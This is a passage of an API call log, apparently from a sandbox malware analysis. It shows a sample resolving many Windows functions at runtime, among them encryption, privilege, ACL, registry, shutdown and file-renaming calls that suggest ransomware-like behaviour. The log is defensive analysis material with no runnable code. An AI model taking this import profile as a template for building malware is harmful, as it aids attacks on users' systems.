(uMode=0x0) returned 0x8001 [0093.729] GetProcAddress (hModule=0x759f0000, lpProcName="CreateDirectoryW") returned 0x75a04259 [0093.729] SetErrorMode (uMode=0x8001) returned 0x0 [0093.729] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.729] SetErrorMode (uMode=0x0) returned 0x8001 [0093.729] GetProcAddress (hModule=0x759f0000, lpProcName="FreeLibrary") returned 0x75a034c8 [0093.730] SetErrorMode (uMode=0x8001) returned 0x0 [0093.730] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.730] SetErrorMode (uMode=0x0) returned 0x8001 [0093.730] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleHandleW") returned 0x75a034b0 [0093.730] SetErrorMode (uMode=0x8001) returned 0x0 [0093.730] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.730] SetErrorMode (uMode=0x0) returned 0x8001 [0093.730] GetProcAddress (hModule=0x759f0000, lpProcName="GetProcAddress") returned 0x75a01222 [0093.730] SetErrorMode (uMode=0x8001) returned 0x0 [0093.730] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.730] SetErrorMode (uMode=0x0) returned 0x8001 [0093.730] GetProcAddress (hModule=0x759f0000, lpProcName="LoadLibraryW") returned 0x75a0492b [0093.730] SetErrorMode (uMode=0x8001) returned 0x0 [0093.730] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.730] SetErrorMode (uMode=0x0) returned 0x8001 [0093.730] GetProcAddress (hModule=0x759f0000, lpProcName="Process32FirstW") returned 0x75a28baf [0093.730] SetErrorMode (uMode=0x8001) returned 0x0 [0093.730] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.731] SetErrorMode (uMode=0x0) returned 0x8001 [0093.731] GetProcAddress (hModule=0x759f0000, lpProcName="Process32NextW") returned 0x75a2896c [0093.731] SetErrorMode (uMode=0x8001) returned 0x0 [0093.731] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.731] SetErrorMode (uMode=0x0) returned 0x8001 [0093.731] GetProcAddress (hModule=0x759f0000, lpProcName="GetLastError") returned 0x75a011c0 [0093.731] SetErrorMode (uMode=0x8001) returned 0x0 [0093.731] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.731] SetErrorMode (uMode=0x0) returned 0x8001 [0093.731] GetProcAddress (hModule=0x759f0000, lpProcName="CreateToolhelp32Snapshot") returned 0x75a2735f [0093.731] SetErrorMode (uMode=0x8001) returned 0x0 [0093.731] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.731] SetErrorMode (uMode=0x0) returned 0x8001 [0093.731] GetProcAddress (hModule=0x759f0000, lpProcName="CreateFileW") returned 0x75a03f5c [0093.731] SetErrorMode (uMode=0x8001) returned 0x0 [0093.731] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.731] SetErrorMode (uMode=0x0) returned 0x8001 [0093.732] GetProcAddress (hModule=0x759f0000, lpProcName="CreateMutexW") returned 0x75a0424c [0093.732] SetErrorMode (uMode=0x8001) returned 0x0 [0093.732] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.732] SetErrorMode (uMode=0x0) returned 0x8001 [0093.732] GetProcAddress (hModule=0x759f0000, lpProcName="ResetEvent") returned 0x75a016dd [0093.732] SetErrorMode (uMode=0x8001) returned 0x0 [0093.732] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.732] SetErrorMode (uMode=0x0) returned 0x8001 [0093.732] GetProcAddress (hModule=0x759f0000, lpProcName="CloseHandle") returned 0x75a01410 [0093.732] SetErrorMode (uMode=0x8001) returned 0x0 [0093.732] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.732] SetErrorMode (uMode=0x0) returned 0x8001 [0093.732] GetProcAddress (hModule=0x759f0000, lpProcName="SetEvent") returned 0x75a016c5 [0093.732] SetErrorMode (uMode=0x8001) returned 0x0 [0093.732] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.733] SetErrorMode (uMode=0x0) returned 0x8001 [0093.733] GetProcAddress (hModule=0x759f0000, lpProcName="Sleep") returned 0x75a010ff [0093.733] SetErrorMode (uMode=0x8001) returned 0x0 [0093.733] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.733] SetErrorMode (uMode=0x0) returned 0x8001 [0093.733] GetProcAddress (hModule=0x759f0000, lpProcName="CreateEventW") returned 0x75a0183e [0093.733] SetErrorMode (uMode=0x8001) returned 0x0 [0093.733] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.733] SetErrorMode (uMode=0x0) returned 0x8001 [0093.733] GetProcAddress (hModule=0x759f0000, lpProcName="WaitForSingleObject") returned 0x75a01136 [0093.733] SetErrorMode (uMode=0x8001) returned 0x0 [0093.733] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.733] SetErrorMode (uMode=0x0) returned 0x8001 [0093.733] GetProcAddress (hModule=0x759f0000, lpProcName="WaitForMultipleObjects") returned 0x75a04220 [0093.733] SetErrorMode (uMode=0x8001) returned 0x0 [0093.733] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.733] SetErrorMode (uMode=0x0) returned 0x8001 [0093.733] GetProcAddress (hModule=0x759f0000, lpProcName="GetTickCount") returned 0x75a0110c [0093.734] SetErrorMode (uMode=0x8001) returned 0x0 [0093.734] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0093.734] SetErrorMode (uMode=0x0) returned 0x8001 [0093.734] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualFree") returned 0x75a0186e [0093.734] SetErrorMode (uMode=0x8001) returned 0x0 [0093.734] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.734] SetErrorMode (uMode=0x0) returned 0x8001 [0093.734] GetProcAddress (hModule=0x75790000, lpProcName="GetIconInfo") returned 0x757b49ea [0093.734] SetErrorMode (uMode=0x8001) returned 0x0 [0093.734] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.734] SetErrorMode (uMode=0x0) returned 0x8001 [0093.734] GetProcAddress (hModule=0x75790000, lpProcName="DrawIcon") returned 0x757b8deb [0093.734] SetErrorMode (uMode=0x8001) returned 0x0 [0093.734] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.734] SetErrorMode (uMode=0x0) returned 0x8001 [0093.734] GetProcAddress (hModule=0x75790000, lpProcName="LoadImageW") returned 0x757afbd1 [0093.734] SetErrorMode (uMode=0x8001) returned 0x0 [0093.734] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.735] SetErrorMode (uMode=0x0) returned 0x8001 [0093.735] GetProcAddress (hModule=0x75790000, lpProcName="GetCursorPos") returned 0x757b1218 [0093.735] SetErrorMode (uMode=0x8001) returned 0x0 [0093.735] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.735] SetErrorMode (uMode=0x0) returned 0x8001 [0093.735] GetProcAddress (hModule=0x75790000, lpProcName="DefWindowProcW") returned 0x772a25dd [0093.735] SetErrorMode (uMode=0x8001) returned 0x0 [0093.735] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.735] SetErrorMode (uMode=0x0) returned 0x8001 [0093.735] GetProcAddress (hModule=0x75790000, lpProcName="CreateWindowExW") returned 0x757a8a29 [0093.735] SetErrorMode (uMode=0x8001) returned 0x0 [0093.735] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.735] SetErrorMode (uMode=0x0) returned 0x8001 [0093.735] GetProcAddress (hModule=0x75790000, lpProcName="UnregisterClassW") returned 0x757a9f84 [0093.735] SetErrorMode (uMode=0x8001) returned 0x0 [0093.735] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.735] SetErrorMode (uMode=0x0) returned 0x8001 [0093.736] GetProcAddress (hModule=0x75790000, lpProcName="GetKeyboardLayoutList") returned 0x757b2e69 [0093.736] SetErrorMode (uMode=0x8001) returned 0x0 [0093.736] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.736] SetErrorMode (uMode=0x0) returned 0x8001 [0093.736] GetProcAddress (hModule=0x75790000, lpProcName="CharLowerA") returned 0x757b3e75 [0093.736] SetErrorMode (uMode=0x8001) returned 0x0 [0093.736] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.736] SetErrorMode (uMode=0x0) returned 0x8001 [0093.736] GetProcAddress (hModule=0x75790000, lpProcName="CharToOemW") returned 0x75801a26 [0093.736] SetErrorMode (uMode=0x8001) returned 0x0 [0093.736] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.736] SetErrorMode (uMode=0x0) returned 0x8001 [0093.736] GetProcAddress (hModule=0x75790000, lpProcName="TranslateMessage") returned 0x757a7809 [0093.736] SetErrorMode (uMode=0x8001) returned 0x0 [0093.736] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.736] SetErrorMode (uMode=0x0) returned 0x8001 [0093.736] GetProcAddress (hModule=0x75790000, lpProcName="PeekMessageW") returned 0x757b05ba [0093.736] SetErrorMode (uMode=0x8001) returned 0x0 [0093.736] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.737] SetErrorMode (uMode=0x0) returned 0x8001 [0093.737] GetProcAddress (hModule=0x75790000, lpProcName="DispatchMessageW") returned 0x757a787b [0093.737] SetErrorMode (uMode=0x8001) returned 0x0 [0093.737] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.737] SetErrorMode (uMode=0x0) returned 0x8001 [0093.737] GetProcAddress (hModule=0x75790000, lpProcName="MsgWaitForMultipleObjects") returned 0x757b0b4a [0093.737] SetErrorMode (uMode=0x8001) returned 0x0 [0093.737] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.737] SetErrorMode (uMode=0x0) returned 0x8001 [0093.737] GetProcAddress (hModule=0x75790000, lpProcName="RegisterClassExW") returned 0x757ab17d [0093.737] SetErrorMode (uMode=0x8001) returned 0x0 [0093.737] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.737] SetErrorMode (uMode=0x0) returned 0x8001 [0093.737] GetProcAddress (hModule=0x75790000, lpProcName="SetWindowLongA") returned 0x757b6110 [0093.737] SetErrorMode (uMode=0x8001) returned 0x0 [0093.737] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.737] SetErrorMode (uMode=0x0) returned 0x8001 [0093.738] GetProcAddress (hModule=0x75790000, lpProcName="GetWindowLongA") returned 0x757ad156 [0093.738] SetErrorMode (uMode=0x8001) returned 0x0 [0093.738] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.738] SetErrorMode (uMode=0x0) returned 0x8001 [0093.738] GetProcAddress (hModule=0x75790000, lpProcName="CharUpperW") returned 0x757af350 [0093.738] SetErrorMode (uMode=0x8001) returned 0x0 [0093.738] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0093.738] SetErrorMode (uMode=0x0) returned 0x8001 [0093.738] GetProcAddress (hModule=0x75790000, lpProcName="DestroyWindow") returned 0x757a9a55 [0093.738] SetErrorMode (uMode=0x8001) returned 0x0 [0093.738] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x758d0000 [0093.739] SetErrorMode (uMode=0x0) returned 0x8001 [0093.740] GetProcAddress (hModule=0x758d0000, lpProcName="CryptImportPublicKeyInfo") returned 0x758e6c0e [0093.740] SetErrorMode (uMode=0x8001) returned 0x0 [0093.740] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x758d0000 [0093.740] SetErrorMode (uMode=0x0) returned 0x8001 [0093.740] GetProcAddress (hModule=0x758d0000, lpProcName="CryptDecodeObjectEx") returned 0x758dd718 [0093.740] SetErrorMode (uMode=0x8001) returned 0x0 [0093.740] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.740] SetErrorMode (uMode=0x0) returned 0x8001 [0093.740] GetProcAddress (hModule=0x756e0000, lpProcName="RegCloseKey") returned 0x756f469d [0093.740] SetErrorMode (uMode=0x8001) returned 0x0 [0093.740] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.740] SetErrorMode (uMode=0x0) returned 0x8001 [0093.740] GetProcAddress (hModule=0x756e0000, lpProcName="GetAce") returned 0x756f45f0 [0093.740] SetErrorMode (uMode=0x8001) returned 0x0 [0093.740] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.740] SetErrorMode (uMode=0x0) returned 0x8001 [0093.741] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x7570779b [0093.741] SetErrorMode (uMode=0x8001) returned 0x0 [0093.741] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.741] SetErrorMode (uMode=0x0) returned 0x8001 [0093.741] GetProcAddress (hModule=0x756e0000, lpProcName="GetSidSubAuthorityCount") returned 0x756f0e0c [0093.741] SetErrorMode (uMode=0x8001) returned 0x0 [0093.741] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.741] SetErrorMode (uMode=0x0) returned 0x8001 [0093.741] GetProcAddress (hModule=0x756e0000, lpProcName="AllocateAndInitializeSid") returned 0x756f40e6 [0093.741] SetErrorMode (uMode=0x8001) returned 0x0 [0093.741] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.741] SetErrorMode (uMode=0x0) returned 0x8001 [0093.741] GetProcAddress (hModule=0x756e0000, lpProcName="GetSidSubAuthority") returned 0x756f0e24 [0093.741] SetErrorMode (uMode=0x8001) returned 0x0 [0093.741] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.741] SetErrorMode (uMode=0x0) returned 0x8001 [0093.741] GetProcAddress (hModule=0x756e0000, lpProcName="SetEntriesInAclW") returned 0x756f2a66 [0093.741] SetErrorMode (uMode=0x8001) returned 0x0 [0093.742] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.742] SetErrorMode (uMode=0x0) returned 0x8001 [0093.742] GetProcAddress (hModule=0x756e0000, lpProcName="RegCreateKeyExW") returned 0x756f40fe [0093.742] SetErrorMode (uMode=0x8001) returned 0x0 [0093.742] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.742] SetErrorMode (uMode=0x0) returned 0x8001 [0093.742] GetProcAddress (hModule=0x756e0000, lpProcName="CryptVerifySignatureW") returned 0x756ec54a [0093.742] SetErrorMode (uMode=0x8001) returned 0x0 [0093.742] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.742] SetErrorMode (uMode=0x0) returned 0x8001 [0093.742] GetProcAddress (hModule=0x756e0000, lpProcName="SetNamedSecurityInfoW") returned 0x756e9fe2 [0093.742] SetErrorMode (uMode=0x8001) returned 0x0 [0093.742] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.742] SetErrorMode (uMode=0x0) returned 0x8001 [0093.742] GetProcAddress (hModule=0x756e0000, lpProcName="GetNamedSecurityInfoW") returned 0x756ef4fd [0093.742] SetErrorMode (uMode=0x8001) returned 0x0 [0093.742] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.742] SetErrorMode (uMode=0x0) returned 0x8001 [0093.743] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756edf4e [0093.743] SetErrorMode (uMode=0x8001) returned 0x0 [0093.743] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.743] SetErrorMode (uMode=0x0) returned 0x8001 [0093.743] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756edf36 [0093.743] SetErrorMode (uMode=0x8001) returned 0x0 [0093.743] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.743] SetErrorMode (uMode=0x0) returned 0x8001 [0093.743] GetProcAddress (hModule=0x756e0000, lpProcName="SetSecurityDescriptorSacl") returned 0x756f4680 [0093.743] SetErrorMode (uMode=0x8001) returned 0x0 [0093.743] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.743] SetErrorMode (uMode=0x0) returned 0x8001 [0093.743] GetProcAddress (hModule=0x756e0000, lpProcName="RegSetValueExW") returned 0x756f14d6 [0093.743] SetErrorMode (uMode=0x8001) returned 0x0 [0093.743] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.743] SetErrorMode (uMode=0x0) returned 0x8001 [0093.743] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756edf66 [0093.744] SetErrorMode (uMode=0x8001) returned 0x0 [0093.744] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.744] SetErrorMode (uMode=0x0) returned 0x8001 [0093.744] GetProcAddress (hModule=0x756e0000, lpProcName="OpenProcessToken") returned 0x756f4304 [0093.744] SetErrorMode (uMode=0x8001) returned 0x0 [0093.744] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.744] SetErrorMode (uMode=0x0) returned 0x8001 [0093.744] GetProcAddress (hModule=0x756e0000, lpProcName="FreeSid") returned 0x756f412e [0093.744] SetErrorMode (uMode=0x8001) returned 0x0 [0093.744] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.744] SetErrorMode (uMode=0x0) returned 0x8001 [0093.744] GetProcAddress (hModule=0x756e0000, lpProcName="InitializeSecurityDescriptor") returned 0x756f4620 [0093.744] SetErrorMode (uMode=0x8001) returned 0x0 [0093.744] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.744] SetErrorMode (uMode=0x0) returned 0x8001 [0093.744] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExW") returned 0x756f468d [0093.744] SetErrorMode (uMode=0x8001) returned 0x0 [0093.744] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.745] SetErrorMode (uMode=0x0) returned 0x8001 [0093.745] GetProcAddress (hModule=0x756e0000, lpProcName="CryptImportKey") returned 0x756ec532 [0093.745] SetErrorMode (uMode=0x8001) returned 0x0 [0093.745] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.745] SetErrorMode (uMode=0x0) returned 0x8001 [0093.745] GetProcAddress (hModule=0x756e0000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x756f1f59 [0093.745] SetErrorMode (uMode=0x8001) returned 0x0 [0093.745] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.745] SetErrorMode (uMode=0x0) returned 0x8001 [0093.745] GetProcAddress (hModule=0x756e0000, lpProcName="OpenThreadToken") returned 0x756f432c [0093.745] SetErrorMode (uMode=0x8001) returned 0x0 [0093.745] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.745] SetErrorMode (uMode=0x0) returned 0x8001 [0093.745] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExW") returned 0x756f46ad [0093.745] SetErrorMode (uMode=0x8001) returned 0x0 [0093.745] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.745] SetErrorMode (uMode=0x0) returned 0x8001 [0093.746] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ee124 [0093.746] SetErrorMode (uMode=0x8001) returned 0x0 [0093.746] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.746] SetErrorMode (uMode=0x0) returned 0x8001 [0093.746] GetProcAddress (hModule=0x756e0000, lpProcName="GetTokenInformation") returned 0x756f431c [0093.746] SetErrorMode (uMode=0x8001) returned 0x0 [0093.746] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.746] SetErrorMode (uMode=0x0) returned 0x8001 [0093.746] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ec51a [0093.746] SetErrorMode (uMode=0x8001) returned 0x0 [0093.746] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.746] SetErrorMode (uMode=0x0) returned 0x8001 [0093.746] GetProcAddress (hModule=0x756e0000, lpProcName="AdjustTokenPrivileges") returned 0x756f418e [0093.746] SetErrorMode (uMode=0x8001) returned 0x0 [0093.746] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.746] SetErrorMode (uMode=0x0) returned 0x8001 [0093.746] GetProcAddress (hModule=0x756e0000, lpProcName="SetSecurityDescriptorDacl") returned 0x756f415e [0093.746] SetErrorMode (uMode=0x8001) returned 0x0 [0093.746] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.747] SetErrorMode (uMode=0x0) returned 0x8001 [0093.747] GetProcAddress (hModule=0x756e0000, lpProcName="GetSecurityDescriptorSacl") returned 0x756f4608 [0093.747] SetErrorMode (uMode=0x8001) returned 0x0 [0093.747] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.747] SetErrorMode (uMode=0x0) returned 0x8001 [0093.747] GetProcAddress (hModule=0x756e0000, lpProcName="LookupPrivilegeValueW") returned 0x756f41b3 [0093.747] SetErrorMode (uMode=0x8001) returned 0x0 [0093.747] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.747] SetErrorMode (uMode=0x0) returned 0x8001 [0093.747] GetProcAddress (hModule=0x756e0000, lpProcName="GetLengthSid") returned 0x756f413b [0093.747] SetErrorMode (uMode=0x8001) returned 0x0 [0093.747] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.748] SetErrorMode (uMode=0x0) returned 0x8001 [0093.748] GetProcAddress (hModule=0x756e0000, lpProcName="RegDeleteValueW") returned 0x756ecf31 [0093.748] SetErrorMode (uMode=0x8001) returned 0x0 [0093.748] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.748] SetErrorMode (uMode=0x0) returned 0x8001 [0093.748] GetProcAddress (hModule=0x756e0000, lpProcName="RegFlushKey") returned 0x7570773f [0093.748] SetErrorMode (uMode=0x8001) returned 0x0 [0093.748] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.748] SetErrorMode (uMode=0x0) returned 0x8001 [0093.748] GetProcAddress (hModule=0x756e0000, lpProcName="RegNotifyChangeKeyValue") returned 0x756ee15b [0093.748] SetErrorMode (uMode=0x8001) returned 0x0 [0093.748] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.749] SetErrorMode (uMode=0x0) returned 0x8001 [0093.749] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryInfoKeyW") returned 0x756f46e7 [0093.749] SetErrorMode (uMode=0x8001) returned 0x0 [0093.749] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.749] SetErrorMode (uMode=0x0) returned 0x8001 [0093.749] GetProcAddress (hModule=0x756e0000, lpProcName="RegEnumKeyW") returned 0x756f445b [0093.749] SetErrorMode (uMode=0x8001) returned 0x0 [0093.749] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.749] SetErrorMode (uMode=0x0) returned 0x8001 [0093.749] GetProcAddress (hModule=0x756e0000, lpProcName="InitiateSystemShutdownExW") returned 0x7573db3a [0093.749] SetErrorMode (uMode=0x8001) returned 0x0 [0093.749] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0093.749] SetErrorMode (uMode=0x0) returned 0x8001 [0093.749] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextW") returned 0x756edf14 [0093.749] SetErrorMode (uMode=0x8001) returned 0x0 [0093.749] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75c50000 [0093.749] SetErrorMode (uMode=0x0) returned 0x8001 [0093.750] GetProcAddress (hModule=0x75c50000, lpProcName="ShellExecuteW") returned 0x75c63c71 [0093.750] SetErrorMode (uMode=0x8001) returned 0x0 [0093.750] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75c50000 [0093.750] SetErrorMode (uMode=0x0) returned 0x8001 [0093.750] GetProcAddress (hModule=0x75c50000, lpProcName="ShellExecuteExW") returned 0x75c71e46 [0093.750] SetErrorMode (uMode=0x8001) returned 0x0 [0093.750] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75c50000 [0093.750] SetErrorMode (uMode=0x0) returned 0x8001 [0093.750] GetProcAddress (hModule=0x75c50000, lpProcName="SHGetFolderPathW") returned 0x75cd5708 [0093.750] SetErrorMode (uMode=0x8001) returned 0x0 [0093.750] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.750] SetErrorMode (uMode=0x0) returned 0x8001 [0093.750] GetProcAddress (hModule=0x750d0000, lpProcName="PathFileExistsW") returned 0x750e45bf [0093.750] SetErrorMode (uMode=0x8001) returned 0x0 [0093.750] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.750] SetErrorMode (uMode=0x0) returned 0x8001 [0093.750] GetProcAddress (hModule=0x750d0000, lpProcName="PathIsURLW") returned 0x750e55bf [0093.750] SetErrorMode (uMode=0x8001) returned 0x0 [0093.751] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.751] SetErrorMode (uMode=0x0) returned 0x8001 [0093.751] GetProcAddress (hModule=0x750d0000, lpProcName="PathIsDirectoryEmptyW") returned 0x7510cd81 [0093.751] SetErrorMode (uMode=0x8001) returned 0x0 [0093.751] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.751] SetErrorMode (uMode=0x0) returned 0x8001 [0093.751] GetProcAddress (hModule=0x750d0000, lpProcName="StrCmpNIW") returned 0x750e4745 [0093.751] SetErrorMode (uMode=0x8001) returned 0x0 [0093.751] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.751] SetErrorMode (uMode=0x0) returned 0x8001 [0093.751] GetProcAddress (hModule=0x750d0000, lpProcName="PathRenameExtensionW") returned 0x7510d32a [0093.751] SetErrorMode (uMode=0x8001) returned 0x0 [0093.751] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.751] SetErrorMode (uMode=0x0) returned 0x8001 [0093.751] GetProcAddress (hModule=0x750d0000, lpProcName="StrStrIW") returned 0x750e46e9 [0093.751] SetErrorMode (uMode=0x8001) returned 0x0 [0093.751] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.752] SetErrorMode (uMode=0x0) returned 0x8001 [0093.752] GetProcAddress (hModule=0x750d0000, lpProcName="PathMatchSpecW") returned 0x750e86f7 [0093.752] SetErrorMode (uMode=0x8001) returned 0x0 [0093.752] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.752] SetErrorMode (uMode=0x0) returned 0x8001 [0093.752] GetProcAddress (hModule=0x750d0000, lpProcName="PathCombineW") returned 0x750ec39c [0093.752] SetErrorMode (uMode=0x8001) returned 0x0 [0093.752] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.752] SetErrorMode (uMode=0x0) returned 0x8001 [0093.752] GetProcAddress (hModule=0x750d0000, lpProcName="PathRemoveFileSpecW") returned 0x750e3248 [0093.752] SetErrorMode (uMode=0x8001) returned 0x0 [0093.752] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.752] SetErrorMode (uMode=0x0) returned 0x8001 [0093.752] GetProcAddress (hModule=0x750d0000, lpProcName="PathAddBackslashW") returned 0x750ec177 [0093.752] SetErrorMode (uMode=0x8001) returned 0x0 [0093.752] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.752] SetErrorMode (uMode=0x0) returned 0x8001 [0093.753] GetProcAddress (hModule=0x750d0000, lpProcName="wvnsprintfW") returned 0x7511066c [0093.753] SetErrorMode (uMode=0x8001) returned 0x0 [0093.753] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.753] SetErrorMode (uMode=0x0) returned 0x8001 [0093.753] GetProcAddress (hModule=0x750d0000, lpProcName="PathUnquoteSpacesW") returned 0x750e5331 [0093.753] SetErrorMode (uMode=0x8001) returned 0x0 [0093.753] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.753] SetErrorMode (uMode=0x0) returned 0x8001 [0093.753] GetProcAddress (hModule=0x750d0000, lpProcName="PathSkipRootW") returned 0x750ffbf5 [0093.753] SetErrorMode (uMode=0x8001) returned 0x0 [0093.753] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.753] SetErrorMode (uMode=0x0) returned 0x8001 [0093.753] GetProcAddress (hModule=0x750d0000, lpProcName="PathFindExtensionW") returned 0x750ea1b9 [0093.753] SetErrorMode (uMode=0x8001) returned 0x0 [0093.753] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0093.753] SetErrorMode (uMode=0x0) returned 0x8001 [0093.753] GetProcAddress (hModule=0x750d0000, lpProcName="SHDeleteValueW") returned 0x750dfcca [0093.753] SetErrorMode 